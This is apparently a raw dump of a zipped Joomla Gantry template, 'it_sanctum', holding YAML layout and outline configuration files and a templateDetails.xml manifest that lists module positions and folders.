            - 'position-content-top-b 50'
          -
            - system-content-1470
          -
            - 'position-content-bottom-a 50'
            - 'position-content-bottom-b 50'
      -
        'aside 30':
          -
            - position-sidebar-right
  /mainbottom/:
    -
      - 'position-mainbottom-a 25'
      - 'position-mainbottom-b 25'
      - 'position-mainbottom-c 25'
      - 'position-mainbottom-d 25'
  /extension/:
    -
      - 'position-extension-a 25'
      - 'position-extension-b 25'
      - 'position-extension-c 25'
      - 'position-extension-d 25'
  /additional/:
    -
      - 'position-additional-a 25'
      - 'position-additional-b 25'
      - 'position-additional-c 25'
      - 'position-additional-d 25'
  /prebottom/:
    -
      - 'position-prebottom-a 25'
      - 'position-prebottom-b 25'
      - 'position-prebottom-c 25'
      - 'position-prebottom-d 25'
  /bottom/:
    -
      - 'position-bottom-a 25'
      - 'position-bottom-b 25'
      - 'position-bottom-c 25'
      - 'position-bottom-d 25'
  /afterbottom/:
    -
      - 'position-afterbottom-a 25'
      - 'position-afterbottom-b 25'
      - 'position-afterbottom-c 25'
      - 'position-afterbottom-d 25'
  /last/:
    -
      - 'position-last-a 25'
      - 'position-last-b 25'
      - 'position-last-c 25'
      - 'position-last-d 25'
  /footer/:
    -
      - 'position-footer-a 25'
      - 'position-footer-b 25'
      - 'position-footer-c 45'
      - 'position-footer-d 5'
  /copyright/:
    -
      - 'position-copyright-a 25'
      - 'position-copyright-b 25'
      - 'position-copyright-c 25'
      - 'position-copyright-d 25'
  /to-top/:
    -
      - totop-7314
  offcanvas:
    -
      - mobile-menu-8307
    -
      - position-offcanvas-a
    -
      - position-offcanvas-b
structure:
  drawer:
    type: section
    attributes:
      boxed: ''
  top:
    type: section
    attributes:
      boxed: ''
  header:
    attributes:
      boxed: ''
      class: ''
  navigation:
    type: section
    attributes:
      boxed: ''
      class: ''
      extra:
        -
          data-uk-sticky: '{media: 768}'
  breadcrumb:
    type: section
    attributes:
      boxed: ''
  fullwidth:
    type: section
    attributes:
      boxed: ''
  showcase:
    type: section
    attributes:
      boxed: ''
  intro:
    type: section
    attributes:
      boxed: ''
  feature:
    type: section
    attributes:
      boxed: ''
  subfeature:
    type: section
    attributes:
      boxed: ''
  utility:
    type: section
    attributes:
      boxed: ''
  maintop:
    type: section
    attributes:
      boxed: ''
  system-messages:
    type: section
    attributes:
      boxed: ''
  sidebar:
    type: section
    attributes:
      class: ''
    block:
      fixed: '1'
  mainbody:
    type: section
  aside:
    attributes:
      class: ''
    block:
      fixed: '1'
  container-main:
    attributes:
      boxed: ''
  mainbottom:
    type: section
    attributes:
      boxed: ''
  extension:
    type: section
    attributes:
      boxed: ''
  additional:
    type: section
    attributes:
      boxed: ''
  prebottom:
    type: section
    attributes:
      boxed: ''
  bottom:
    type: section
    attributes:
      boxed: ''
  afterbottom:
    type: section
    attributes:
      boxed: ''
  last:
    type: section
    attributes:
      boxed: ''
  footer:
    attributes:
      boxed: ''
  copyright:
    type: section
    attributes:
      boxed: ''
  to-top:
    type: section
    attributes:
      boxed: ''
  offcanvas:
    attributes:
      position: g-offcanvas-left
      class: ''
      extra: {  }
      swipe: '0'
      css3animation: '1'
content:
  position-drawer:
    attributes:
      key: drawer
  position-top-a:
    attributes:
      key: top-a
  position-top-b:
    attributes:
      key: top-b
    block:
      class: hidden-phone
  position-top-c:
    attributes:
      key: top-c
  position-top-d:
    attributes:
      key: top-d
  position-navigation-c:
    title: Header-a
    attributes:
      key: header-a
  position-navigation-d:
    title: Header-b
    attributes:
      key: header-b
  menu-6643:
    attributes:
      mobileTarget: '1'
  position-breadcrumb-a:
    attributes:
      key: breadcrumb-a
  position-breadcrumb-b:
    attributes:
      key: breadcrumb-b
  position-breadcrumb-c:
    attributes:
      key: breadcrumb-c
  position-breadcrumb-d:
    attributes:
      key: breadcrumb-d
  position-fullwidth:
    attributes:
      key: fullwidth
  position-showcase-a:
    attributes:
      key: showcase-a
  position-showcase-b:
    attributes:
      key: showcase-b
  position-showcase-c:
    attributes:
      key: showcase-c
  position-showcase-d:
    attributes:
      key: showcase-d
  position-intro-a:
    attributes:
      key: intro-a
  position-intro-b:
    attributes:
      key: intro-b
  position-intro-c:
    attributes:
      key: intro-c
  position-intro-d:
    attributes:
      key: intro-d
  position-feature-a:
    attributes:
      key: feature-a
  position-feature-b:
    attributes:
      key: feature-b
  position-feature-c:
    attributes:
      key: feature-c
  position-feature-d:
    attributes:
      key: feature-d
  position-subfeature-a:
    attributes:
      key: subfeature-a
  position-subfeature-b:
    attributes:
      key: subfeature-b
  position-subfeature-c:
    attributes:
      key: subfeature-c
  position-subfeature-d:
    attributes:
      key: subfeature-d
  position-utility-a:
    attributes:
      key: utility-a
  position-utility-b:
    attributes:
      key: utility-b
  position-utility-c:
    attributes:
      key: utility-c
  position-utility-d:
    attributes:
      key: utility-d
  position-maintop-a:
    attributes:
      key: maintop-a
  position-maintop-b:
    attributes:
      key: maintop-b
  position-maintop-c:
    attributes:
      key: maintop-c
  position-maintop-d:
    attributes:
      key: maintop-d
  position-sidebar-left:
    attributes:
      key: sidebar-left
  position-content-top-a:
    attributes:
      key: content-top-a
  position-content-top-b:
    attributes:
      key: content-top-b
  position-content-bottom-a:
    attributes:
      key: content-bottom-a
  position-content-bottom-b:
    attributes:
      key: content-bottom-b
  position-sidebar-right:
    attributes:
      key: sidebar-right
  position-mainbottom-a:
    attributes:
      key: mainbottom-a
  position-mainbottom-b:
    attributes:
      key: mainbottom-b
  position-mainbottom-c:
    attributes:
      key: mainbottom-c
  position-mainbottom-d:
    attributes:
      key: mainbottom-d
  position-extension-a:
    attributes:
      key: extension-a
  position-extension-b:
    attributes:
      key: extension-b
  position-extension-c:
    attributes:
      key: extension-c
  position-extension-d:
    attributes:
      key: extension-d
  position-additional-a:
    attributes:
      key: additional-a
  position-additional-b:
    attributes:
      key: additional-b
  position-additional-c:
    attributes:
      key: additional-c
  position-additional-d:
    attributes:
      key: additional-d
  position-prebottom-a:
    attributes:
      key: prebottom-a
  position-prebottom-b:
    attributes:
      key: prebottom-b
  position-prebottom-c:
    attributes:
      key: prebottom-c
  position-prebottom-d:
    attributes:
      key: prebottom-d
  position-bottom-a:
    attributes:
      key: bottom-a
  position-bottom-b:
    attributes:
      key: bottom-b
  position-bottom-c:
    attributes:
      key: bottom-c
  position-bottom-d:
    attributes:
      key: bottom-d
  position-afterbottom-a:
    attributes:
      key: afterbottom-a
  position-afterbottom-b:
    attributes:
      key: afterbottom-b
  position-afterbottom-c:
    attributes:
      key: afterbottom-c
  position-afterbottom-d:
    attributes:
      key: afterbottom-d
  position-last-a:
    attributes:
      key: last-a
  position-last-b:
    attributes:
      key: last-b
  position-last-c:
    attributes:
      key: last-c
  position-last-d:
    attributes:
      key: last-d
  position-footer-a:
    attributes:
      key: footer-a
  position-footer-b:
    attributes:
      key: footer-b
  position-footer-c:
    attributes:
      key: footer-c
  position-footer-d:
    attributes:
      key: footer-d
  position-copyright-a:
    attributes:
      key: copyright-a
  position-copyright-b:
    attributes:
      key: copyright-b
  position-copyright-c:
    attributes:
      key: copyright-c
  position-copyright-d:
    attributes:
      key: copyright-d
  position-offcanvas-a:
    attributes:
      key: offcanvas-a
  position-offcanvas-b:
    attributes:
      key: offcanvas-b
PK!���V��"it_sanctum/layouts/_body_only.yamlnu&1i�version: 2

preset:
  image: gantry-admin://images/layouts/body-only.png

layout:
  /main/:
    - system-messages
    - system-content
PK!���(�(it_sanctum/layouts/_error.yamlnu&1i�version: 2
preset:
  image: 'gantry-admin://images/layouts/error.png'
  name: _error
  timestamp: 1473315426
layout:
  /drawer/:
    -
      - position-drawer
  /top/:
    -
      - 'position-top-a 25'
      - 'position-top-b 25'
      - 'position-top-c 25'
      - 'position-top-d 25'
  /header/:
    -
      - 'position-navigation-c 33.3'
      - 'logo-6391 33.3'
      - 'position-navigation-d 33.3'
  /navigation/:
    -
      - menu-6643
  /breadcrumb/:
    -
      - 'position-breadcrumb-a 25'
      - 'position-breadcrumb-b 25'
      - 'position-breadcrumb-c 25'
      - 'position-breadcrumb-d 25'
  /fullwidth/:
    -
      - position-fullwidth
  /showcase/:
    -
      - 'position-showcase-a 25'
      - 'position-showcase-b 25'
      - 'position-showcase-c 25'
      - 'position-showcase-d 25'
  /intro/:
    -
      - 'position-intro-a 25'
      - 'position-intro-b 25'
      - 'position-intro-c 25'
      - 'position-intro-d 25'
  /feature/:
    -
      - 'position-feature-a 25'
      - 'position-feature-b 25'
      - 'position-feature-c 25'
      - 'position-feature-d 25'
  /subfeature/:
    -
      - 'position-subfeature-a 25'
      - 'position-subfeature-b 25'
      - 'position-subfeature-c 25'
      - 'position-subfeature-d 25'
  /utility/:
    -
      - 'position-utility-a 25'
      - 'position-utility-b 25'
      - 'position-utility-c 25'
      - 'position-utility-d 25'
  /maintop/:
    -
      - 'position-maintop-a 25'
      - 'position-maintop-b 25'
      - 'position-maintop-c 25'
      - 'position-maintop-d 25'
  /system-messages/:
    -
      - system-messages-4492
  /container-main/:
    -
      -
        'sidebar 30':
          -
            - position-sidebar-left
      -
        'mainbody 40':
          -
            - 'position-content-top-a 50'
            - 'position-content-top-b 50'
          -
            - system-content-1470
          -
            - 'position-content-bottom-a 50'
            - 'position-content-bottom-b 50'
      -
        'aside 30':
          -
            - position-sidebar-right
  /mainbottom/:
    -
      - 'position-mainbottom-a 25'
      - 'position-mainbottom-b 25'
      - 'position-mainbottom-c 25'
      - 'position-mainbottom-d 25'
  /extension/:
    -
      - 'position-extension-a 25'
      - 'position-extension-b 25'
      - 'position-extension-c 25'
      - 'position-extension-d 25'
  /additional/:
    -
      - 'position-additional-a 25'
      - 'position-additional-b 25'
      - 'position-additional-c 25'
      - 'position-additional-d 25'
  /prebottom/:
    -
      - 'position-prebottom-a 25'
      - 'position-prebottom-b 25'
      - 'position-prebottom-c 25'
      - 'position-prebottom-d 25'
  /bottom/:
    -
      - 'position-bottom-a 25'
      - 'position-bottom-b 25'
      - 'position-bottom-c 25'
      - 'position-bottom-d 25'
  /afterbottom/:
    -
      - 'position-afterbottom-a 25'
      - 'position-afterbottom-b 25'
      - 'position-afterbottom-c 25'
      - 'position-afterbottom-d 25'
  /last/:
    -
      - 'position-last-a 25'
      - 'position-last-b 25'
      - 'position-last-c 25'
      - 'position-last-d 25'
  /footer/:
    -
      - 'position-footer-a 25'
      - 'position-footer-b 25'
      - 'position-footer-c 45'
      - 'position-footer-d 5'
  /copyright/:
    -
      - 'position-copyright-a 25'
      - 'position-copyright-b 25'
      - 'position-copyright-c 25'
      - 'position-copyright-d 25'
  /to-top/:
    -
      - totop-7314
  offcanvas:
    -
      - mobile-menu-8307
    -
      - position-offcanvas-a
    -
      - position-offcanvas-b
structure:
  drawer:
    type: section
    attributes:
      boxed: ''
  top:
    type: section
    attributes:
      boxed: ''
  header:
    attributes:
      boxed: ''
      class: ''
  navigation:
    type: section
    attributes:
      boxed: ''
      class: ''
      extra:
        -
          data-uk-sticky: '{media: 768}'
  breadcrumb:
    type: section
    attributes:
      boxed: ''
  fullwidth:
    type: section
    attributes:
      boxed: ''
  showcase:
    type: section
    attributes:
      boxed: ''
  intro:
    type: section
    attributes:
      boxed: ''
  feature:
    type: section
    attributes:
      boxed: ''
  subfeature:
    type: section
    attributes:
      boxed: ''
  utility:
    type: section
    attributes:
      boxed: ''
  maintop:
    type: section
    attributes:
      boxed: ''
  system-messages:
    type: section
    attributes:
      boxed: ''
  sidebar:
    type: section
    attributes:
      class: ''
    block:
      fixed: '1'
  mainbody:
    type: section
  aside:
    attributes:
      class: ''
    block:
      fixed: '1'
  container-main:
    attributes:
      boxed: ''
  mainbottom:
    type: section
    attributes:
      boxed: ''
  extension:
    type: section
    attributes:
      boxed: ''
  additional:
    type: section
    attributes:
      boxed: ''
  prebottom:
    type: section
    attributes:
      boxed: ''
  bottom:
    type: section
    attributes:
      boxed: ''
  afterbottom:
    type: section
    attributes:
      boxed: ''
  last:
    type: section
    attributes:
      boxed: ''
  footer:
    attributes:
      boxed: ''
  copyright:
    type: section
    attributes:
      boxed: ''
  to-top:
    type: section
    attributes:
      boxed: ''
  offcanvas:
    attributes:
      position: g-offcanvas-left
      class: ''
      extra: {  }
      swipe: '0'
      css3animation: '1'
content:
  position-drawer:
    attributes:
      key: drawer
  position-top-a:
    attributes:
      key: top-a
  position-top-b:
    attributes:
      key: top-b
    block:
      class: hidden-phone
  position-top-c:
    attributes:
      key: top-c
  position-top-d:
    attributes:
      key: top-d
  position-navigation-c:
    title: Header-a
    attributes:
      key: header-a
  position-navigation-d:
    title: Header-b
    attributes:
      key: header-b
  menu-6643:
    attributes:
      mobileTarget: '1'
  position-breadcrumb-a:
    attributes:
      key: breadcrumb-a
  position-breadcrumb-b:
    attributes:
      key: breadcrumb-b
  position-breadcrumb-c:
    attributes:
      key: breadcrumb-c
  position-breadcrumb-d:
    attributes:
      key: breadcrumb-d
  position-fullwidth:
    attributes:
      key: fullwidth
  position-showcase-a:
    attributes:
      key: showcase-a
  position-showcase-b:
    attributes:
      key: showcase-b
  position-showcase-c:
    attributes:
      key: showcase-c
  position-showcase-d:
    attributes:
      key: showcase-d
  position-intro-a:
    attributes:
      key: intro-a
  position-intro-b:
    attributes:
      key: intro-b
  position-intro-c:
    attributes:
      key: intro-c
  position-intro-d:
    attributes:
      key: intro-d
  position-feature-a:
    attributes:
      key: feature-a
  position-feature-b:
    attributes:
      key: feature-b
  position-feature-c:
    attributes:
      key: feature-c
  position-feature-d:
    attributes:
      key: feature-d
  position-subfeature-a:
    attributes:
      key: subfeature-a
  position-subfeature-b:
    attributes:
      key: subfeature-b
  position-subfeature-c:
    attributes:
      key: subfeature-c
  position-subfeature-d:
    attributes:
      key: subfeature-d
  position-utility-a:
    attributes:
      key: utility-a
  position-utility-b:
    attributes:
      key: utility-b
  position-utility-c:
    attributes:
      key: utility-c
  position-utility-d:
    attributes:
      key: utility-d
  position-maintop-a:
    attributes:
      key: maintop-a
  position-maintop-b:
    attributes:
      key: maintop-b
  position-maintop-c:
    attributes:
      key: maintop-c
  position-maintop-d:
    attributes:
      key: maintop-d
  position-sidebar-left:
    attributes:
      key: sidebar-left
  position-content-top-a:
    attributes:
      key: content-top-a
  position-content-top-b:
    attributes:
      key: content-top-b
  position-content-bottom-a:
    attributes:
      key: content-bottom-a
  position-content-bottom-b:
    attributes:
      key: content-bottom-b
  position-sidebar-right:
    attributes:
      key: sidebar-right
  position-mainbottom-a:
    attributes:
      key: mainbottom-a
  position-mainbottom-b:
    attributes:
      key: mainbottom-b
  position-mainbottom-c:
    attributes:
      key: mainbottom-c
  position-mainbottom-d:
    attributes:
      key: mainbottom-d
  position-extension-a:
    attributes:
      key: extension-a
  position-extension-b:
    attributes:
      key: extension-b
  position-extension-c:
    attributes:
      key: extension-c
  position-extension-d:
    attributes:
      key: extension-d
  position-additional-a:
    attributes:
      key: additional-a
  position-additional-b:
    attributes:
      key: additional-b
  position-additional-c:
    attributes:
      key: additional-c
  position-additional-d:
    attributes:
      key: additional-d
  position-prebottom-a:
    attributes:
      key: prebottom-a
  position-prebottom-b:
    attributes:
      key: prebottom-b
  position-prebottom-c:
    attributes:
      key: prebottom-c
  position-prebottom-d:
    attributes:
      key: prebottom-d
  position-bottom-a:
    attributes:
      key: bottom-a
  position-bottom-b:
    attributes:
      key: bottom-b
  position-bottom-c:
    attributes:
      key: bottom-c
  position-bottom-d:
    attributes:
      key: bottom-d
  position-afterbottom-a:
    attributes:
      key: afterbottom-a
  position-afterbottom-b:
    attributes:
      key: afterbottom-b
  position-afterbottom-c:
    attributes:
      key: afterbottom-c
  position-afterbottom-d:
    attributes:
      key: afterbottom-d
  position-last-a:
    attributes:
      key: last-a
  position-last-b:
    attributes:
      key: last-b
  position-last-c:
    attributes:
      key: last-c
  position-last-d:
    attributes:
      key: last-d
  position-footer-a:
    attributes:
      key: footer-a
  position-footer-b:
    attributes:
      key: footer-b
  position-footer-c:
    attributes:
      key: footer-c
  position-footer-d:
    attributes:
      key: footer-d
  position-copyright-a:
    attributes:
      key: copyright-a
  position-copyright-b:
    attributes:
      key: copyright-b
  position-copyright-c:
    attributes:
      key: copyright-c
  position-copyright-d:
    attributes:
      key: copyright-d
  position-offcanvas-a:
    attributes:
      key: offcanvas-a
  position-offcanvas-b:
    attributes:
      key: offcanvas-b
PK!GW??it_sanctum/templateDetails.xmlnu&1i�<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<extension version="3.4" type="template" client="site" method="upgrade">
    <name>it_sanctum</name>
    <version>1.6.0</version>
    <creationDate>October, 2016</creationDate>
    <author>InspireTheme LTD</author>
    <authorEmail>office@inspiretheme.com</authorEmail>
    <authorUrl>http://www.inspiretheme.com</authorUrl>
    <copyright>(C) InspireTheme LTD. All rights reserved.</copyright>
    <license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2</license>
    <description>TPL_IT_SANCTUM_DESC</description>

    <scriptfile>install.php</scriptfile>

    <files>
        <folder>admin</folder>
        <folder>blueprints</folder>
        <folder>config</folder>
        <folder>fields</folder>
        <folder>fonts</folder>
        <folder>gantry</folder>
        <folder>html</folder>
        <folder>images</folder>
        <folder>includes</folder>
        <folder>install</folder>
        <folder>js</folder>
        <folder>language</folder>
        <folder>layouts</folder>
        <folder>particles</folder>
        <folder>scss</folder>
        <folder>uikit</folder>
        <file>component.php</file>
        <file>error.php</file>
        <file>index.php</file>
        <file>offline.php</file>
        <file>template_preview.png</file>
        <file>template_thumbnail.png</file>
    </files>

    <positions>
        <position>additional-a</position>
        <position>additional-b</position>
        <position>additional-c</position>
        <position>additional-d</position>
        <position>afterbottom-a</position>
        <position>afterbottom-b</position>
        <position>afterbottom-c</position>
        <position>afterbottom-d</position>
        <position>bottom-a</position>
        <position>bottom-b</position>
        <position>bottom-c</position>
        <position>bottom-d</position>
        <position>breadcrumb-a</position>
        <position>breadcrumb-b</position>
        <position>breadcrumb-c</position>
        <position>breadcrumb-d</position>
        <position>content-bottom-a</position>
        <position>content-bottom-b</position>
        <position>content-top-a</position>
        <position>content-top-b</position>
        <position>copyright-a</position>
        <position>copyright-b</position>
        <position>copyright-c</position>
        <position>copyright-d</position>
        <position>debug</position>
        <position>drawer</position>
        <position>extension-a</position>
        <position>extension-b</position>
        <position>extension-c</position>
        <position>extension-d</position>
        <position>feature-a</position>
        <position>feature-b</position>
        <position>feature-c</position>
        <position>feature-d</position>
        <position>footer</position>
        <position>footer-a</position>
        <position>footer-b</position>
        <position>footer-c</position>
        <position>footer-d</position>
        <position>fullwidth</position>
        <position>header-a</position>
        <position>header-b</position>
        <position>intro-a</position>
        <position>intro-b</position>
        <position>intro-c</position>
        <position>intro-d</position>
        <position>last-a</position>
        <position>last-b</position>
        <position>last-c</position>
        <position>last-d</position>
        <position>mainbottom-a</position>
        <position>mainbottom-b</position>
        <position>mainbottom-c</position>
        <position>mainbottom-d</position>
        <position>maintop-a</position>
        <position>maintop-b</position>
        <position>maintop-c</position>
        <position>maintop-d</position>
        <position>offcanvas-a</position>
        <position>offcanvas-b</position>
        <position>prebottom-a</position>
        <position>prebottom-b</position>
        <position>prebottom-c</position>
        <position>prebottom-d</position>
        <position>showcase-a</position>
        <position>showcase-b</position>
        <position>showcase-c</position>
        <position>showcase-d</position>
        <position>sidebar-left</position>
        <position>sidebar-right</position>
        <position>subfeature-a</position>
        <position>subfeature-b</position>
        <position>subfeature-c</position>
        <position>subfeature-d</position>
        <position>top-a</position>
        <position>top-b</position>
        <position>top-c</position>
        <position>top-d</position>
        <position>utility-a</position>
        <position>utility-b</position>
        <position>utility-c</position>
        <position>utility-d</position>
    </positions>

    <config>
        <fields name="params" addfieldpath="/templates/it_sanctum/fields">
            <fieldset name="advanced">
                <field name="warning" type="warning"/>
            </fieldset>
        </fields>
    </config>

</extension>
PK!��+���$it_sanctum/config/_error/layout.yamlnu&1i�version: 2
preset:
  image: 'gantry-admin://images/layouts/default.png'
  name: default
  timestamp: 1473315426
layout:
  drawer: {  }
  top: {  }
  header: {  }
  navigation: {  }
  breadcrumb: {  }
  fullwidth: {  }
  showcase: {  }
  intro: {  }
  feature: {  }
  subfeature: {  }
  utility: {  }
  maintop: {  }
  system-messages: {  }
  /container-main/:
    -
      0:
        'sidebar 30': {  }
      1:
        'mainbody 37': {  }
      block-1024: {  }
  mainbottom: {  }
  extension: {  }
  additional: {  }
  prebottom: {  }
  bottom: {  }
  afterbottom: {  }
  last: {  }
  footer: {  }
  copyright: {  }
  to-top: {  }
  offcanvas: {  }
structure:
  drawer:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  top:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  header:
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  navigation:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  breadcrumb:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  fullwidth:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  showcase:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  intro:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  feature:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  subfeature:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  utility:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  maintop:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  system-messages:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  sidebar:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
    block:
      fixed: '1'
  mainbody:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  block-1024:
    attributes:
      fixed: '1'
  container-main:
    attributes:
      boxed: ''
  mainbottom:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  extension:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  additional:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  prebottom:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  bottom:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  afterbottom:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  last:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  footer:
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  copyright:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  to-top:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  offcanvas:
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
PK!�T�І)�)#it_sanctum/config/_error/index.yamlnu&1i�name: _error
timestamp: 1475821784
version: 7
preset:
  image: 'gantry-admin://images/layouts/default.png'
  name: default
  timestamp: 1473315426
positions:
  drawer: Drawer
  top-a: Top-a
  top-b: Top-b
  top-c: Top-c
  top-d: Top-d
  header-a: Header-a
  header-b: Header-b
  breadcrumb-a: Breadcrumb-a
  breadcrumb-b: Breadcrumb-b
  breadcrumb-c: Breadcrumb-c
  breadcrumb-d: Breadcrumb-d
  fullwidth: Fullwidth
  showcase-a: Showcase-a
  showcase-b: Showcase-b
  showcase-c: Showcase-c
  showcase-d: Showcase-d
  intro-a: Intro-a
  intro-b: Intro-b
  intro-c: Intro-c
  intro-d: Intro-d
  feature-a: Feature-a
  feature-b: Feature-b
  feature-c: Feature-c
  feature-d: Feature-d
  subfeature-a: Subfeature-a
  subfeature-b: Subfeature-b
  subfeature-c: Subfeature-c
  subfeature-d: Subfeature-d
  utility-a: Utility-a
  utility-b: Utility-b
  utility-c: Utility-c
  utility-d: Utility-d
  maintop-a: Maintop-a
  maintop-b: Maintop-b
  maintop-c: Maintop-c
  maintop-d: Maintop-d
  sidebar-left: Sidebar-left
  content-top-a: Content-top-a
  content-top-b: Content-top-b
  content-bottom-a: Content-bottom-a
  content-bottom-b: Content-bottom-b
  mainbottom-a: Mainbottom-a
  mainbottom-b: Mainbottom-b
  mainbottom-c: Mainbottom-c
  mainbottom-d: Mainbottom-d
  extension-a: Extension-a
  extension-b: Extension-b
  extension-c: Extension-c
  extension-d: Extension-d
  additional-a: Additional-a
  additional-b: Additional-b
  additional-c: Additional-c
  additional-d: Additional-d
  prebottom-a: Prebottom-a
  prebottom-b: Prebottom-b
  prebottom-c: Prebottom-c
  prebottom-d: Prebottom-d
  bottom-a: Bottom-a
  bottom-b: Bottom-b
  bottom-c: Bottom-c
  bottom-d: Bottom-d
  afterbottom-a: Afterbottom-a
  afterbottom-b: Afterbottom-b
  afterbottom-c: Afterbottom-c
  afterbottom-d: Afterbottom-d
  last-a: Last-a
  last-b: Last-b
  last-c: Last-c
  last-d: Last-d
  footer-a: Footer-a
  footer-b: Footer-b
  footer-c: Footer-c
  footer-d: Footer-d
  copyright-a: Copyright-a
  copyright-b: Copyright-b
  copyright-c: Copyright-c
  copyright-d: Copyright-d
  offcanvas-a: Offcanvas-a
  offcanvas-b: Offcanvas-b
sections:
  drawer: Drawer
  top: Top
  navigation: Navigation
  breadcrumb: Breadcrumb
  fullwidth: Fullwidth
  showcase: Showcase
  intro: Intro
  feature: Feature
  subfeature: Subfeature
  utility: Utility
  maintop: Maintop
  system-messages: System-messages
  sidebar: Sidebar
  mainbody: Mainbody
  mainbottom: Mainbottom
  extension: Extension
  additional: Additional
  prebottom: Prebottom
  bottom: Bottom
  afterbottom: Afterbottom
  last: Last
  copyright: Copyright
  to-top: To-top
  header: Header
  footer: Footer
  offcanvas: Offcanvas
particles:
  position:
    position-position-7623: Drawer
    position-position-9087: Top-a
    position-position-8851: Top-b
    position-position-3449: Top-c
    position-position-5681: Top-d
    position-position-4264: Header-a
    position-position-8596: Header-b
    position-position-3656: Breadcrumb-a
    position-position-1812: Breadcrumb-b
    position-position-7715: Breadcrumb-c
    position-position-1553: Breadcrumb-d
    position-position-2749: Fullwidth
    position-position-9137: Showcase-a
    position-position-9351: Showcase-b
    position-position-5672: Showcase-c
    position-position-8373: Showcase-d
    position-position-6411: Intro-a
    position-position-1356: Intro-b
    position-position-4570: Intro-c
    position-position-6625: Intro-d
    position-position-5749: Feature-a
    position-position-1421: Feature-b
    position-position-9645: Feature-c
    position-position-6942: Feature-d
    position-position-1038: Subfeature-a
    position-position-6295: Subfeature-b
    position-position-8188: Subfeature-c
    position-position-1549: Subfeature-d
    position-position-5550: Utility-a
    position-position-5811: Utility-b
    position-position-9636: Utility-c
    position-position-4401: Utility-d
    position-position-8260: Maintop-a
    position-position-5317: Maintop-b
    position-position-7666: Maintop-c
    position-position-6261: Maintop-d
    position-position-1149: Sidebar-left
    position-position-8918: Content-top-a
    position-position-4726: Content-top-b
    position-position-9471: Content-bottom-a
    position-position-6475: Content-bottom-b
    position-position-8823: Mainbottom-a
    position-position-2148: Mainbottom-b
    position-position-5376: Mainbottom-c
    position-position-5235: Mainbottom-d
    position-position-2504: Extension-a
    position-position-8947: Extension-b
    position-position-1860: Extension-c
    position-position-7253: Extension-d
    position-position-9368: Additional-a
    position-position-1506: Additional-b
    position-position-4196: Additional-c
    position-position-9407: Additional-d
    position-position-6801: Prebottom-a
    position-position-2384: Prebottom-b
    position-position-9956: Prebottom-c
    position-position-2351: Prebottom-d
    position-position-7196: Bottom-a
    position-position-9592: Bottom-b
    position-position-5753: Bottom-c
    position-position-5456: Bottom-d
    position-position-4910: Afterbottom-a
    position-position-3419: Afterbottom-b
    position-position-1718: Afterbottom-c
    position-position-7824: Afterbottom-d
    position-position-3569: Last-a
    position-position-9637: Last-b
    position-position-2550: Last-c
    position-position-1435: Last-d
    position-position-9108: Footer-a
    position-position-8026: Footer-b
    position-position-7438: Footer-c
    position-position-7932: Footer-d
    position-position-9174: Copyright-a
    position-position-2815: Copyright-b
    position-position-3167: Copyright-c
    position-position-1679: Copyright-d
    position-position-7933: Offcanvas-a
    position-position-1131: Offcanvas-b
  logo:
    logo-8000: Logo
  menu:
    menu-3483: Menu
  messages:
    system-messages-3913: 'System Messages'
  content:
    system-content-7865: 'Page Content'
  totop:
    totop-1762: Totop
  mobile-menu:
    mobile-menu-4028: Mobile-menu
inherit:
  default:
    drawer: drawer
    position-position-7623: position-drawer
    top: top
    position-position-9087: position-top-a
    position-position-8851: position-top-b
    position-position-3449: position-top-c
    position-position-5681: position-top-d
    header: header
    position-position-4264: position-navigation-c
    logo-8000: logo-6391
    position-position-8596: position-navigation-d
    navigation: navigation
    menu-3483: menu-6643
    breadcrumb: breadcrumb
    position-position-3656: position-breadcrumb-a
    position-position-1812: position-breadcrumb-b
    position-position-7715: position-breadcrumb-c
    position-position-1553: position-breadcrumb-d
    fullwidth: fullwidth
    position-position-2749: position-fullwidth
    showcase: showcase
    position-position-9137: position-showcase-a
    position-position-9351: position-showcase-b
    position-position-5672: position-showcase-c
    position-position-8373: position-showcase-d
    intro: intro
    position-position-6411: position-intro-a
    position-position-1356: position-intro-b
    position-position-4570: position-intro-c
    position-position-6625: position-intro-d
    feature: feature
    position-position-5749: position-feature-a
    position-position-1421: position-feature-b
    position-position-9645: position-feature-c
    position-position-6942: position-feature-d
    subfeature: subfeature
    position-position-1038: position-subfeature-a
    position-position-6295: position-subfeature-b
    position-position-8188: position-subfeature-c
    position-position-1549: position-subfeature-d
    utility: utility
    position-position-5550: position-utility-a
    position-position-5811: position-utility-b
    position-position-9636: position-utility-c
    position-position-4401: position-utility-d
    maintop: maintop
    position-position-8260: position-maintop-a
    position-position-5317: position-maintop-b
    position-position-7666: position-maintop-c
    position-position-6261: position-maintop-d
    system-messages: system-messages
    system-messages-3913: system-messages-4492
    sidebar: sidebar
    position-position-1149: position-sidebar-left
    mainbody: mainbody
